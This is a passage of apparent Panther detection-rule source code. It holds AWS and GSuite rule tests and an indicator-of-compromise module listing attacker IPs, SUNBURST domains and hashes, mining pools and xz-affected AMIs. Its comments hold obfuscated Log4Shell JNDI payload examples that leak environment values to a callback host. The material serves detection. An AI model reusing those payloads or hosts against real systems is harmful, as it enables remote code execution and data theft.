                "masterUserPassword": "****",
                "maxAllocatedStorage": 1000,
            },
            "responseElements": {
                "allocatedStorage": 20,
                "associatedRoles": [],
                "autoMinorVersionUpgrade": True,
                "availabilityZone": "us-west-1b",
                "backupRetentionPeriod": 0,
                "backupTarget": "region",
                "cACertificateIdentifier": "rds-ca-2019",
                "copyTagsToSnapshot": True,
                "customerOwnedIpEnabled": False,
                "dBInstanceArn": "arn:aws:rds:us-west-1:123456789012:db:my-database",
                "dBInstanceClass": "db.t3.micro",
                "dBInstanceIdentifier": "my-database",
                "dBInstanceStatus": "available",
                "dBName": "test",
                "dBParameterGroups": [{"dBParameterGroupName": "default.mysql8.0", "parameterApplyStatus": "in-sync"}],
                "dBSecurityGroups": [],
                "dBSubnetGroup": {
                    "dBSubnetGroupDescription": "Created from the RDS Management Console",
                    "dBSubnetGroupName": "default-vpc-f9999999",
                    "subnetGroupStatus": "Complete",
                    "subnets": [
                        {
                            "subnetAvailabilityZone": {"name": "us-west-1c"},
                            "subnetIdentifier": "subnet-8cb458ea",
                            "subnetOutpost": {},
                            "subnetStatus": "Active",
                        },
                        {
                            "subnetAvailabilityZone": {"name": "us-west-1b"},
                            "subnetIdentifier": "subnet-8382bbd8",
                            "subnetOutpost": {},
                            "subnetStatus": "Active",
                        },
                    ],
                    "vpcId": "vpc-f9999999",
                },
                "dbInstancePort": 0,
                "dbiResourceId": "db-FEVDSUCWJ43PXONVT6ZU2TK4WY",
                "deletionProtection": False,
                "domainMemberships": [],
                "enabledCloudwatchLogsExports": ["audit", "error", "general"],
                "endpoint": {
                    "address": "my-database.cbsugyyyyyyy.us-west-1.rds.amazonaws.com",
                    "hostedZoneId": "Z10WI91S59XXQN",
                    "port": 3306,
                },
                "engine": "mysql",
                "engineVersion": "8.0.28",
                "httpEndpointEnabled": False,
                "iAMDatabaseAuthenticationEnabled": False,
                "instanceCreateTime": "Sep 23, 2022 11:25:46 PM",
                "kmsKeyId": "arn:aws:kms:us-west-1:123456789012:key/e2c16323-1c31-45fb-adda-07e5c9f78997",
                "licenseModel": "general-public-license",
                "masterUsername": "admin",
                "maxAllocatedStorage": 1000,
                "monitoringInterval": 0,
                "multiAZ": False,
                "networkType": "IPV4",
                "optionGroupMemberships": [{"optionGroupName": "default:mysql-8-0", "status": "in-sync"}],
                "pendingModifiedValues": {"masterUserPassword": "****"},
                "performanceInsightsEnabled": False,
                "preferredBackupWindow": "11:52-12:22",
                "preferredMaintenanceWindow": "tue:13:03-tue:13:33",
                "publiclyAccessible": True,
                "readReplicaDBInstanceIdentifiers": [],
                "storageEncrypted": True,
                "storageThroughput": 0,
                "storageType": "gp2",
                "tagList": [],
                "vpcSecurityGroups": [{"status": "active", "vpcSecurityGroupId": "sg-d963a5a4"}],
            },
            "sessionCredentialFromConsole": True,
            "sourceIPAddress": "AWS Internal",
            "userAgent": "AWS Internal",
            "userIdentity": {
                "accessKeyId": "ASIASWJRT64ZWCAMGCWI",
                "accountId": "123456789012",
                "arn": "arn:aws:sts::123456789012:assumed-role/Admin/Jack",
                "principalId": "AROAJ4ULUNLE6DYF4PCOK:jack",
                "sessionContext": {
                    "attributes": {"creationDate": "2022-09-23T23:17:13Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "123456789012",
                        "arn": "arn:aws:iam::123456789012:role/Admin",
                        "principalId": "AROAJ4ULUNLE6DYF4PCOK",
                        "type": "Role",
                        "userName": "Admin",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
]


@panther_managed
class AWSRDSMasterPasswordUpdated(Rule):
    default_description = "A sensitive database operation that should be performed carefully or rarely"
    display_name = "AWS RDS Master Password Updated"
    default_reference = "https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.DBInstance.Modifying.html"
    default_severity = Severity.LOW
    reports = {"MITRE ATT&CK": ["TA0003:T1098"]}
    summary_attributes = [
        "awsRegion",
        "userIdentity:arn",
        "responseElements:dBInstanceIdentifier",
        "p_any_aws_arns",
        "p_any_aws_account_ids",
    ]
    log_types = [LogType.AWS_CLOUDTRAIL]
    id = "AWS.RDS.MasterPasswordUpdated-prototype"
    tests = awsrds_master_password_updated_tests

    def rule(self, event):
        return (
            event.get("eventName") == "ModifyDBInstance"
            and event.get("eventSource") == "rds.amazonaws.com"
            and bool(deep_get(event, "responseElements", "pendingModifiedValues", "masterUserPassword"))
        )

    def title(self, event):
        return f"RDS Master Password Updated on [{deep_get(event, 'responseElements', 'dBInstanceArn')}]"



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import deep_get

awswaf_disassociation_tests: list[RuleTest] = [
    RuleTest(
        name="WAF-Disassociate",
        expected_result=True,
        log={
            "apiVersion": "2019-04-23",
            "awsRegion": "us-west-2",
            "eventCategory": "Management",
            "eventID": "94678efc-2176-462c-b0c9-a612881a39ed",
            "eventName": "DisassociateWebACL",
            "eventSource": "wafv2.amazonaws.com",
            "eventTime": "2022-09-29 23:04:35",
            "eventType": "AwsApiCall",
            "eventVersion": "1.08",
            "managementEvent": True,
            "p_any_aws_account_ids": ["012345678910"],
            "p_any_aws_arns": [
                "arn:aws:elasticloadbalancing:us-west-2:012345678910:loadbalancer/app/web/84dc5457e450dba5",
                "arn:aws:iam::012345678910:role/DevAdministrator",
                "arn:aws:sts::012345678910:assumed-role/DevAdministrator/example_user",
            ],
            "p_any_domain_names": ["AWS Internal"],
            "p_any_trace_ids": ["ASIARLIVEKVNJNSTUSF6"],
            "p_event_time": "2022-09-29 23:04:35",
            "p_log_type": "AWS.CloudTrail",
            "p_parse_time": "2022-09-29 23:08:26.172",
            "p_row_id": "5ad3a83ca88f938cbff8fdd913d1ce1d",
            "p_source_id": "125a8146-e3ea-454b-aed7-9e08e735b670",
            "p_source_label": "Panther Identity Org CloudTrail",
            "readOnly": False,
            "recipientAccountId": "012345678910",
            "requestID": "e4d47992-90f1-47f0-bff7-de18a8277005",
            "requestParameters": {
                "resourceArn": "arn:aws:elasticloadbalancing:us-west-2:012345678910:loadbalancer/app/web/84dc5457e450dba5",
            },
            "sessionCredentialFromConsole": True,
            "sourceIPAddress": "AWS Internal",
            "userAgent": "AWS Internal",
            "userIdentity": {
                "accessKeyId": "ASIARLIVEKVNJNSTUSF6",
                "accountId": "012345678910",
                "arn": "arn:aws:sts::012345678910:assumed-role/DevAdministrator/example_user",
                "principalId": "AROARLIVEKVNIRVGDLJWJ:example_user",
                "sessionContext": {
                    "attributes": {"creationDate": "2022-09-29T22:51:13Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "012345678910",
                        "arn": "arn:aws:iam::012345678910:role/DevAdministrator",
                        "principalId": "AROARLIVEKVNIRVGDLJWJ",
                        "type": "Role",
                        "userName": "DevAdministrator",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
    RuleTest(
        name="WAF - List WebACLs",
        expected_result=False,
        log={
            "apiVersion": "2019-04-23",
            "awsRegion": "us-west-2",
            "eventCategory": "Management",
            "eventID": "94678efc-2176-462c-b0c9-a612881a39ed",
            "eventName": "ListWebACLs",
            "eventSource": "wafv2.amazonaws.com",
            "eventTime": "2022-09-29 23:04:35",
            "eventType": "AwsApiCall",
            "eventVersion": "1.08",
            "managementEvent": True,
            "p_any_aws_account_ids": ["012345678910"],
            "p_any_aws_arns": [
                "arn:aws:elasticloadbalancing:us-west-2:012345678910:loadbalancer/app/web/84dc5457e450dba5",
                "arn:aws:iam::012345678910:role/DevAdministrator",
                "arn:aws:sts::012345678910:assumed-role/DevAdministrator/example_user",
            ],
            "p_any_domain_names": ["AWS Internal"],
            "p_any_trace_ids": ["ASIARLIVEKVNJNSTUSF6"],
            "p_event_time": "2022-09-29 23:04:35",
            "p_log_type": "AWS.CloudTrail",
            "p_parse_time": "2022-09-29 23:08:26.172",
            "p_row_id": "5ad3a83ca88f938cbff8fdd913d1ce1d",
            "p_source_id": "125a8146-e3ea-454b-aed7-9e08e735b670",
            "p_source_label": "Panther Identity Org CloudTrail",
            "readOnly": False,
            "recipientAccountId": "012345678910",
            "requestID": "e4d47992-90f1-47f0-bff7-de18a8277005",
            "requestParameters": {
                "resourceArn": "arn:aws:elasticloadbalancing:us-west-2:012345678910:loadbalancer/app/web/84dc5457e450dba5",
            },
            "sessionCredentialFromConsole": True,
            "sourceIPAddress": "AWS Internal",
            "userAgent": "AWS Internal",
            "userIdentity": {
                "accessKeyId": "ASIARLIVEKVNJNSTUSF6",
                "accountId": "012345678910",
                "arn": "arn:aws:sts::012345678910:assumed-role/DevAdministrator/example_user",
                "principalId": "AROARLIVEKVNIRVGDLJWJ:example_user",
                "sessionContext": {
                    "attributes": {"creationDate": "2022-09-29T22:51:13Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "012345678910",
                        "arn": "arn:aws:iam::012345678910:role/DevAdministrator",
                        "principalId": "AROARLIVEKVNIRVGDLJWJ",
                        "type": "Role",
                        "userName": "DevAdministrator",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
]


@panther_managed
class AWSWAFDisassociation(Rule):
    default_description = "Detection to alert when a WAF disassociates from a source."
    display_name = "AWS WAF Disassociation"
    default_reference = "https://attack.mitre.org/techniques/T1078/"
    default_severity = Severity.CRITICAL
    reports = {"MITRE ATT&CK": ["TA0004:T1498"]}
    log_types = [LogType.AWS_CLOUDTRAIL]
    id = "AWS.WAF.Disassociation-prototype"
    tests = awswaf_disassociation_tests

    def rule(self, event):
        return event.get("eventName") == "DisassociateWebACL"

    def title(self, event):
        return f"AWS Account ID [{event.get('recipientAccountId')}] disassociated WebACL [{deep_get(event, 'requestParameters', 'resourceArn')}]"

    def alert_context(self, event):
        return {
            "awsRegion": event.get("awsRegion"),
            "eventName": event.get("eventName"),
            "recipientAccountId": event.get("recipientAccountId"),
            "requestID": event.get("requestID"),
            "requestParameters": deep_get(event, "requestParameters", "resourceArn"),
            "userIdentity": deep_get(event, "userIdentity", "principalId"),
        }



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import deep_get

g_suite_device_suspicious_activity_tests: list[RuleTest] = [
    RuleTest(
        name="Normal Mobile Event",
        expected_result=False,
        log={
            "id": {"applicationName": "mobile"},
            "actor": {"callerType": "USER", "email": "homer.simpson@example.io"},
            "type": "device_updates",
            "name": "DEVICE_SYNC_EVENT",
            "parameters": {"USER_EMAIL": "homer.simpson@example.io"},
        },
    ),
    RuleTest(
        name="Suspicious Activity",
        expected_result=True,
        log={
            "id": {"applicationName": "mobile"},
            "actor": {"callerType": "USER", "email": "homer.simpson@example.io"},
            "type": "device_updates",
            "name": "SUSPICIOUS_ACTIVITY_EVENT",
            "parameters": {"USER_EMAIL": "homer.simpson@example.io"},
        },
    ),
]


@panther_managed
class GSuiteDeviceSuspiciousActivity(Rule):
    id = "GSuite.DeviceSuspiciousActivity-prototype"
    display_name = "GSuite Device Suspicious Activity"
    log_types = [LogType.GSUITE_ACTIVITY_EVENT]
    tags = ["GSuite"]
    default_severity = Severity.LOW
    default_description = "GSuite reported a suspicious activity on a user's device.\n"
    default_reference = "https://support.google.com/a/answer/7562460?hl=en&sjid=864417124752637253-EU"
    default_runbook = "Validate that the suspicious activity was expected by the user.\n"
    summary_attributes = ["actor:email"]
    tests = g_suite_device_suspicious_activity_tests

    def rule(self, event):
        if deep_get(event, "id", "applicationName") != "mobile":
            return False
        return bool(event.get("name") == "SUSPICIOUS_ACTIVITY_EVENT")

    def title(self, event):
        return f"User [{deep_get(event, 'actor', 'email', default='<UNKNOWN_USER>')}]'s device was compromised"



"""Global helpers and variables used for finding matches on known indicators of compromise (IOCs)"""
# pylint: disable=line-too-long

# 2022-06-02 Confluence 0-Day IOCs:
# https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/indicators.csv
VOLEXITY_CONFLUENCE_IP_IOCS = {
    "156.146.34.46",
    "156.146.34.9",
    "156.146.56.136",
    "198.147.22.148",
    "45.43.19.91",
    "66.115.182.102",
    "66.115.182.111",
    "67.149.61.16",
    "154.16.105.147",
    "64.64.228.239",
    "156.146.34.52",
    "154.146.34.145",
    "221.178.126.244",
    "59.163.248.170",
    "98.32.230.38",
}

# SUNBURST IOCs:
# https://github.com/fireeye/sunburst_countermeasures/blob/main/indicator_release/Indicator_Release_NBIs.csv
# Last accessed: 2021-11-17
SUNBURST_FQDN_IOCS = {
    "databasegalore.com",
    "deftsecurity.com",
    "freescanonline.com",
    "highdatabase.com",
    "incomeupdate.com",
    "panhardware.com",
    "thedoccloud.com",
    "websitetheme.com",
    "zupertech.com",
    "6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com",
    "7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com",
    "gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com",
    "ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com",
    "k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com",
    "mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com",
}

SUNBURST_IP_IOCS = {"0.0.0.1"}

# https://github.com/mandiant/sunburst_countermeasures/blob/main/indicator_release/Indicator_Release_Hashes.csv
# Last accessed: 2021-11-17
SUNBURST_SHA256_IOCS = {
    "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134",
    "292327e5c94afa352cc5a02ca273df543f2020d0e76368ff96c84f4e90778712",
    "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77",
    "53f8dfc65169ccda021b72a62e0c22a4db7c4077f002fa742717d41b3c40f2c7",
    "abe22cf0d78836c3ea072daeaf4c5eeaf9c29b6feb597741651979fc8fbd2417",
    "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6",
    "d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600",
}

# LOG4J IOCs:
# IPs Pulled from the following sources, deduped and compiled here.
# https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
# https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv
# https://raw.githubusercontent.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228/main/Threatview.io-log4j2-IOC-list
# Created 12-13-21

LOG4J_IP_IOCS = {
    # The rule using this set has been deprecated and disabled by default
    "0.0.0.1",
}

# Example sources:
# - https://www.fastly.com/blog/new-data-and-insights-into-log4shell-attacks-cve-2021-44228
# - https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
LOG4J_EXPLOIT_IOCS = {
    "jndi:ldap:/",
    "jndi:rmi:/",
    "jndi:ldaps:/",
    "jndi:dns:/",
    "jndi:nis:/",
    "jndi:nds:/",
    "jndi:corba:/",
    "jndi:iiop:/",
    "jndi:${",
    "${jndi:",  # breadth
    "${lower:",  # example: ${jn${lower:d}i:l${lower:d}ap://example.${lower:c}om:1234/callback}
    "${upper:",  # example: ${jnd${upper:i}:ldap://example.com:1234/callback/}
    "${env:",  # example: ${jndi:ldap://example.com:1234/callback/${env:USER}
    "${sys:",  # example: ${jndi:ldap://example.com:1234/callback/${sys:java.version}
    "${java:",  # example: ${jndi:ldap://example.com:1234/callback/${java:os}
    "${date:",  # example: ${jndi:ldap://example.com:1234/callback/${date:MM-dd-yyyy}
    "${::-j",  # example: ${${::-j}${::-n}di:${::-l}d${::-a}p://example.com:1234/callback}
}

# Sources:
# - https://github.com/SigmaHQ/sigma/blob/392500131d75634d8db43b2a2de9ddeb8c9f59dc/rules/network/zeek/zeek_dns_mining_pools.yml
# - https://github.com/SigmaHQ/sigma/blob/392500131d75634d8db43b2a2de9ddeb8c9f59dc/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml
# - https://github.com/SigmaHQ/sigma/blob/392500131d75634d8db43b2a2de9ddeb8c9f59dc/rules/windows/network_connection/net_connection_win_crypto_mining_pools.yml
CRYPTO_MINING_DOMAINS = {
    "1gh.com",
    "abcxyz.stream",
    "alimabi.cn",
    "ap.luckpool.net",
    "asiapool.io",
    "backup-pool.com",
    "baikalmine.com",
    "bcn.pool.minergate.com",
    "bcn.vip.pool.minergate.com",
    "bohemianpool.com",
    "ca.minexmr.com",
    "ca.monero.herominers.com",
    "cbd.monerpool.org",
    "cbdv2.monerpool.org",
    "coinfoundry.org",
    "coinpoolit.webhop.me",
    "coolmining.club",
    "cryptmonero.com",
    "crypto-pool.fr",
    "crypto-pool.info",
    "crypto-pools.org",
    "cryptoescrow.eu",
    "cryptoknight.cc",
    "cryptonight-hub.miningpoolhub.com",
    "cryptonight.net",
    "cryptonotepool.org.uk",
    "cryptonotepool.org",
    "d1pool.ddns.net",
    "d5pool.us",
    "daili01.monerpool.org",
    "de.minexmr.com",
    "dl.nbminer.com",
    "do-dear.com",
    "donate.graef.in",
    "donate.ssl.xmrig.com",
    "donate.v2.xmrig.com",
    "donate.xmrig.com",
    "donate2.graef.in",
    "drill.moneroworld.com",
    "dwarfpool.com",
    "emercoin.com",
    "emercoin.net",
    "emergate.net",
    "ethereumpool.co",
    "eu.luckpool.net",
    "eu.minerpool.pw",
    "extremehash.com",
    "extremepool.org",
    "extrmepool.org",
    "fairhash.org",
    "fairpool.cloud",
    "fairpool.xyz",
    "fcn-xmr.pool.minergate.com",
    "fee.xmrig.com",
    "fr.minexmr.com",
    "freeyy.me",
    "gntl.co.uk",
    "hash-to-coins.com",
    "hashanywhere.com",
    "hashfor.cash",
    "hashinvest.net",
    "hashinvest.ws",
    "hashvault.pro",
    "hellominer.com",
    "herominers.com",
    "huadong1-aeon.ppxxmr.com",
    "iwanttoearn.money",
    "jw-js1.ppxxmr.com",
    "kippo.eu",
    "koto-pool.work",
    "lhr.nbminer.com",
    "lhr3.nbminer.com",
    "linux-repository-updates.com",
    "linux.monerpool.org",
    "litecoinpool.org",
    "lokiturtle.herominers.com",
    "luckpool.net",
    "masari.miner.rocks",
    "mine.c3pool.com",
    "mine.moneropool.com",
    "mine.ppxxmr.com",
    "mine.zpool.ca",
    "mine1.ppxxmr.com",
    "minemonero.gq",
    "miner.center",
    "miner.ppxxmr.com",
    "miner.rocks",
    "minercircle.com",
    "minergate.com",
    "minerpool.pw",
    "minerrocks.com",
    "miners.pro",
    "minerxmr.ru",
    "mineshaft.ml",
    "minexmr.cn",
    "minexmr.com",
    "minexmr.org",
    "mining-help.ru",
    "mininglottery.eu",
    "miningpoolhub.com",
    "mixpools.org",
    "moner.monerpool.org",
    "moner1min.monerpool.org",
    "monero-master.crypto-pool.fr",
    "monero.crypto-pool.fr",
    "monero.farm",
    "monero.hashvault.pro",
    "monero.herominers.com",
    "monero.lindon-pool.win",
    "monero.miners.pro",
    "monero.net",
    "monero.riefly.id",
    "monero.us.to",
    "monerocean.stream",
    "monerogb.com",
    "monerohash.com",
    "monerominers.net",
    "moneroocean.stream",
    "moneropool.com",
    "moneropool.nl",
    "moneropool.ru",
    "moneropools.com",
    "monerorx.com",
    "monerpool.org",
    "mooo.com",
    "moriaxmr.com",
    "mro.pool.minergate.com",
    "multipool.us",
    "multipooler.com",
    "myxmr.pw",
    "na.luckpool.net",
    "nanopool.org",
    "nbminer.com",
    "node3.luckpool.net",
    "noobxmr.com",
    "pangolinminer.comgandalph3000.com",
    "pool-proxy.com",
    "pool.4i7i.com",
    "pool.armornetwork.org",
    "pool.cortins.tk",
    "pool.gntl.co.uk",
    "pool.hashvault.pro",
    "pool.minergate.com",
    "pool.minexmr.com",
    "pool.monero.hashvault.pro",
    "pool.ppxxmr.com",
    "pool.somec.cc",
    "pool.support",
    "pool.supportxmr.com",
    "pool.usa-138.com",
    "pool.xmr.pt",
    "pool.xmrfast.com",
    "pool2.armornetwork.org",
    "poolchange.ppxxmr.com",
    "pooldd.com",
    "poolmining.org",
    "poolto.be",
    "ppxvip1.ppxxmr.com",
    "ppxxmr.com",
    "prohash.net",
    "r.twotouchauthentication.online",
    "randomx.xmrig.com",
    "ratchetmining.com",
    "secumine.net",
    "seed.emercoin.com",
    "seed.emercoin.net",
    "seed.emergate.net",
    "seed1.joulecoin.org",
    "seed2.joulecoin.org",
    "seed3.joulecoin.org",
    "seed4.joulecoin.org",
    "seed5.joulecoin.org",
    "seed6.joulecoin.org",
    "seed7.joulecoin.org",
    "seed8.joulecoin.org",
    "semipool.com",
    "sg.minexmr.com",
    "sheepman.mine.bz",
    "shscrypto.net",
    "siamining.com",
    "sumokoin.minerrocks.com",
    "supportxmr.com",
    "suprnova.cc",
    "teracycle.net",
    "trtl.cnpool.cc",
    "trtl.pool.mine2gether.com",
    "tubepool.xyz",
    "turtle.miner.rocks",
    "unipool.pro",
    "us-west.minexmr.com",
    "usxmrpool.com",
    "viaxmr.com",
    "walpool.com",
    "webcoin.me",
    "webservicepag.webhop.net",
    "xiazai.monerpool.org",
    "xiazai1.monerpool.org",
    "xmc.pool.minergate.com",
    "xmo.pool.minergate.com",
    "xmr-asia1.nanopool.org",
    "xmr-au1.nanopool.org",
    "xmr-eu1.nanopool.org",
    "xmr-eu2.nanopool.org",
    "xmr-jp1.nanopool.org",
    "xmr-us-east1.nanopool.org",
    "xmr-us-west1.nanopool.org",
    "xmr-us.suprnova.cc",
    "xmr-usa.dwarfpool.com",
    "xmr.2miners.com",
    "xmr.5b6b7b.ru",
    "xmr.alimabi.cn",
    "xmr.bohemianpool.com",
    "xmr.crypto-pool.fr",
    "xmr.crypto-pool.info",
    "xmr.f2pool.com",
    "xmr.hashcity.org",
    "xmr.hex7e4.ru",
    "xmr.ip28.net",
    "xmr.monerpool.org",
    "xmr.mypool.online",
    "xmr.nanopool.org",
    "xmr.pool.gntl.co.uk",
    "xmr.pool.minergate.com",
    "xmr.poolto.be",
    "xmr.ppxxmr.com",
    "xmr.prohash.net",
    "xmr.pt",
    "xmr.simka.pw",
    "xmr.somec.cc",
    "xmr.suprnova.cc",
    "xmr.usa-138.com",
    "xmr.vip.pool.minergate.com",
    "xmr1min.monerpool.org",
    "xmrf.520fjh.org",
    "xmrf.fjhan.club",
    "xmrfast.com",
    "xmrget.com",
    "xmrigcc.graef.in",
    "xmrminer.cc",
    "xmrminerpro.com",
    "xmrpool.com",
    "xmrpool.de",
    "xmrpool.eu",
    "xmrpool.me",
    "xmrpool.net",
    "xmrpool.xyz",
    "xx11m.monerpool.org",
    "xx11mv2.monerpool.org",
    "xxx.hex7e4.ru",
    "zarabotaibitok.ru",
    "zer0day.ru",
}

# Ref: CVE-2023-3094
# https://www.helpnetsecurity.com/2024/03/31/xz-backdoored-linux-affected-distros/g
XZ_AMIS = {
    "ami-08f974397021146fe",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-0edfc5ccf045075e0",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-0cdbbdaeecf641b07",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-0ed13d14184c434b1",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-01641141ad4a74f91",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-0b3bfb6a56c63396c",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-0da8d53ccbc7bb06d",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-04ac563c2573f7019",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-095c98047e5191a7b",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-0c31e2163fa4490ac",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-0c54e696e7e698155",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-07c4e32e9e89efb1c",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-ap-northeast-1-gp3-0 ap-northeast-1
    "ami-0f69f59236acd8fba",  # fedora-coreos-40.20240329.10.0-x86_64 ap-northeast-1
    "ami-068eb259340b27a4b",  # fedora-coreos-40.20240329.10.0-aarch64 ap-northeast-1
    "ami-0652e4768eb0787ad",  # fedora-coreos-40.20240331.1.0-x86_64 ap-northeast-1
    "ami-01e935b9f466f9ed7",  # fedora-coreos-40.20240331.1.0-aarch64 ap-northeast-1
    "ami-0132b73d6dd24733f",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-050ba8395805b8ce3",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-0ffa2f4f661fe40a3",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-0f78215de005e2641",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-09289d01066e9af27",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-0cefecd8b408036eb",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-08c6e19a188604111",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-0f8c513258e11202d",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-086df47494fd5ecdb",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-0d5e356a143ff6feb",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-0266f46bdd78350b1",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-0b80d17a7dc5b6c29",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-ap-northeast-2-gp3-0 ap-northeast-2
    "ami-0c940943407a19b23",  # fedora-coreos-40.20240331.1.0-x86_64 ap-northeast-2
    "ami-0a62170ee0a6cb00b",  # fedora-coreos-40.20240329.10.0-aarch64 ap-northeast-2
    "ami-03be7f3add5cd0dde",  # fedora-coreos-40.20240331.1.0-aarch64 ap-northeast-2
    "ami-070eb6616f8f9366e",  # fedora-coreos-40.20240329.10.0-x86_64 ap-northeast-2
    "ami-08a9fa97837000af2",  # fedora-coreos-40.20240329.10.0-aarch64 ap-northeast-3
    "ami-023f10e77fab380ea",  # fedora-coreos-40.20240329.10.0-x86_64 ap-northeast-3
    "ami-030641db3f3f075c6",  # fedora-coreos-40.20240331.1.0-aarch64 ap-northeast-3
    "ami-03a66b5f7d1f45f05",  # fedora-coreos-40.20240331.1.0-x86_64 ap-northeast-3
    "ami-018e5ec4c71a02563",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-0d21816c5fed06222",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-0650e95e10cddfe86",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-0d8a3155917df9224",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-02cf1b782cbf8ce44",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-060d0a90cb0f2a3a8",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-0fceb2aef87248b16",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-0ee33a4d24da47c9e",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-0de9d24a0a956d338",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-ap-south-1-gp3-0 ap-south-1
